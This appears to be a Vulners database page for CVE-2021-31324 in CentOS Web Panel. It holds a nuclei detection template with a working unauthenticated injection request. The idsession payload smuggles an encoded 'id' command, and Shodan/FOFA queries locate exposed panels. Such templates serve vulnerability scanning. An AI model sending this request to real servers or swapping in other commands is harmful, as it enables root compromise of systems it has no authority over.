Lucene search
K

CentOS Web Panel - OS Command Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

Critical OS Command Injection in CentOS Web Panel allows root Remote Code Execution risk.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-31324
16 Jan 202509:29
circl
CNNVD
CentOS Web Panel 操作系统命令注入漏洞
18 May 202100:00
cnnvd
CNVD
CentOS Web Panel Command Injection Vulnerability
21 May 202100:00
cnvd
Check Point Advisories
CentOS Web Panel SQL Injection (CVE-2021-31316; CVE-2021-31324)
20 Jun 202100:00
checkpoint_advisories
CVE
CVE-2021-31324
18 May 202119:43
cve
Cvelist
CVE-2021-31324
18 May 202119:43
cvelist
NVD
CVE-2021-31324
18 May 202120:15
nvd
Prion
Command injection
18 May 202120:15
prion
Positive Technologies
PT-2021-19242 · Unknown · Centos Web Panel
18 May 202100:00
ptsecurity
id: CVE-2021-31324

info:
  name: CentOS Web Panel - OS Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    The unprivileged user portal part of CentOS Web Panel is affected by a Command Injection vulnerability leading to root Remote Code Execution.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands with root privileges via command injection in the idsession parameter, leading to complete server compromise.
  remediation: |
    Apply security updates provided by CentOS Web Panel.
  reference:
    - https://www.shielder.com/advisories/centos-web-panel-idsession-root-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31324
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-31324
    cwe-id: CWE-78
    epss-score: 0.34062
    epss-percentile: 0.98199
    cpe: cpe:2.3:a:control-webpanel:webpanel:-:*:*:*:*:*:*:*
  metadata:
    vendor: control-webpanel
    product: webpanel
    shodan-query: title:"Login | Control WebPanel"
    fofa-query: title="Login | Control WebPanel"
  tags: cve,cve2021,centos,cwpsrv,os,rce,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "cwpsrv")'
        internal: true

  - raw:
      - |
        POST /login/index.php?acc=newpass HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        pass1=c3VwZXJwYXNzd29yZA%3D%3D&idsession=a%27+UNION+SELECT%27a%27%2C%27b%27%2C%27c%27%2C%27YWJjIiBVTklPTiBTRUxFQ1QgJ2EnLCdiJywnYycsJ2QnLCcrMSBkYXknLCdmJy0tIHAiO2lkOyNgfHxhfHxifHxjfHxk%27%2C%27e%27%2C%27f%27--+p

    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 490a0046304402206420264f0c1804388967fe6b8a864dfac82b92fc1b59940bdbe4d70d0fd925fe022070dd28ab206e22227fc35a6114673fe1ddadf20f46d9f1e5c005ab3a6d0d850f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
CVSS 210
EPSS0.34062
23